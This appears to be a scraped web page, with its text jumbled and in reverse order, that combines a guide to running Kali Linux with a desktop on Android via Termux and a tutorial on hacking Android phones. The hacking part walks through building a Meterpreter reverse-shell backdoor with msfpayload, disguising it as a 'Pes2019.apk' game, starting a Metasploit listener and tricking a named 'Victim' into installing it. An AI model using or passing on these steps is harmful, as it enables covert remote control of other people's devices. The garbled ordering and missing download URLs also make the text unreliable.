

Install VNC Viewer in Android and open it. Let Termux run in background by pressing HOME button in Android. You will need it to login in later steps.Īfter setting the password, run the following command: vncserver -kill :1Įcho -e '#!/bin/bash\nxrdb \$HOME/.Xresources\nstartxfce4 &' > ~/.vnc/xstartup When it asks, Create and confirm a new password and remember it. Run the following commands in the Kali Shell: wget & bash de-apt-xfce4.sh Pkg install wget openssl-tool proot -y & hash -r & wget & bash kali.shĪfter completion of the above steps, you will be in Kali Linux Shell. Open Termux and run the following commands: apt update & apt install python python2 openssh -y ( Play Store release is no more updated, so is not recommended.) Just Follow these steps to install Kali Linux with XFCE4 Desktop GUI in Android using Termux:ĭownload and install Termux in Android. It uses Termux to run Kali Linux in Android with XFCE4 Desktop Environment and a Tight VNC Server, which we connect to using a VNC Viewer app in Android. This Guide will help you install Kali Linux in Android, that too with a GUI Desktop Environment within Android. # And when he clicks Open.How to install Kali Linux GUI Desktop in Android using Termux: # However, the option of allowance for Installation of apps from Unknown Source should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.

# Then send it using Uploading it to Dropbox or any sharing website (like: # Let the Victim install the Pes2019 app(as he would think it is meant to play pes2019 game on his phone). # Copy the application that you made (Pes2019.apk) from the root folder, to you android phone. STEP 4 #Exploit #At the end type the command exploit to start the listener. #To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) STEP 3 #We want to set up a Listener # After it loads(it will take time), load the multi-handler exploit by typing the command : use exploit/multi/handler #Set up a (reverse) payload by typing the command : set payload android/meterpreter/reverse_tcp.

#Load metasploit console, by typing the command : msfconsole. STEP 2 #Open another Terminal until the file is being produced. You can simply do this by typing this command in the terminal msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Pes2019.apk (Replace the 192.168.0.4 with your PC IP) apk file to give us a backdoor and malicious remote control over the infected device. #Open the Kali Linux Terminal at the left hand side of the toolbar I can’t see any tutorials explaining this Exploit, so i decided to show you this one. This is a tutorial explaining how to hack android devices with Kali Linux. How to hack an android device remotely using KALI LINUX
